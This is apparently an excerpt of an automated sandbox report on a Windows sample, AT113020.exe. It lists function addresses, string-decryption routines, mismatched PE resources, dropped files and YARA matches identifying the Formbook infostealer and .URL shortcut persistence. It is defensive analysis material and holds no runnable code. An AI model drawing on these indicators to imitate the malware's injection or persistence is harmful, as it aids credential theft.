Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0345AB40	2_2_0345AB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03502B28	2_2_03502B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034F03DA	2_2_034F03DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034FDBD2	2_2_034FDBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0346EBB0	2_2_0346EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034EFA2B	2_2_034EFA2B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035022AE	2_2_035022AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0343F900	2_2_0343F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03454120	2_2_03454120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034599BF	2_2_034599BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034F1002	2_2_034F1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0350E824	2_2_0350E824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0345A830	2_2_0345A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035028EC	2_2_035028EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0344B090	2_2_0344B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034620A0	2_2_034620A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035020A8	2_2_035020A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0350DFCE	2_2_0350DFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03501FF1	2_2_03501FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034FD616	2_2_034FD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03456E30	2_2_03456E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03502EF7	2_2_03502EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03501D55	2_2_03501D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03502D07	2_2_03502D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03430D20	2_2_03430D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035025DD	2_2_035025DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0344D5E0	2_2_0344D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03462581	2_2_03462581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034FD466	2_2_034FD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0344841F	2_2_0344841F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00464BC8	5_2_00464BC8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_004021B0	5_2_004021B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_004484D0	5_2_004484D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: 5_2_00405758	5_2_00405758
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B012	6_2_0041B012
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B8CF	6_2_0041B8CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00408A40	6_2_00408A40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B411	6_2_0041B411
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0041B5DA	6_2_0041B5DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A309	6_2_0309A309
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03142B28	6_2_03142B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309AB40	6_2_0309AB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0311CB4F	6_2_0311CB4F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A138B	6_2_030A138B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AEBB0	6_2_030AEBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0313DBD2	6_2_0313DBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031303DA	6_2_031303DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030AABD8	6_2_030AABD8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031223E3	6_2_031223E3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0312FA2B	6_2_0312FA2B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B236	6_2_0309B236
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031422AE	6_2_031422AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134AEF	6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0307F900	6_2_0307F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03094120	6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030999BF	6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03131002	6_2_03131002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0314E824	6_2_0314E824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309A830	6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308B090	6_2_0308B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A20A0	6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031420A8	6_2_031420A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031428EC	6_2_031428EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0314DFCE	6_2_0314DFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03141FF1	6_2_03141FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0313D616	6_2_0313D616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03096E30	6_2_03096E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03142EF7	6_2_03142EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03142D07	6_2_03142D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03070D20	6_2_03070D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03141D55	6_2_03141D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030A2581	6_2_030A2581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03132D82	6_2_03132D82
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_031425DD	6_2_031425DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308D5E0	6_2_0308D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0308841F	6_2_0308841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0313D466	6_2_0313D466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_0309B477	6_2_0309B477
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_03134496	6_2_03134496

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 00419A50 appears 38 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 0307B150 appears 136 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 0343B150 appears 66 times
Source: C:\Users\user\Desktop\AT113020.exe	Code function: String function: 00404770 appears 83 times
Source: C:\Users\user\Desktop\AT113020.exe	Code function: String function: 00406C88 appears 62 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: String function: 0040FFEC appears 32 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: String function: 00404770 appears 109 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe	Code function: String function: 00406C88 appears 63 times

PE file contains strange resources

Source: AT113020.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Accfdrv.exe.1.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: AT113020.exe, 00000001.00000002.239251872.0000000002430000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.239846712.0000000002780000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.239870107.0000000002790000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.242796472.0000000004790000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs AT113020.exe

Yara signature match

Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.291050180.0000000004AD7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000C.00000002.291050180.0000000004AD7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.240199422.00000000027E7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000001.00000002.240199422.00000000027E7000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.275922238.0000000002807000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000005.00000002.275922238.0000000002807000.00000020.00000001.sdmp, type: MEMORY	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Users\user\AppData\Local\fccA.url, type: DROPPED	Matched rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/ItsReallyNick/status/1176229087196696577, score = 27.09.2019
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
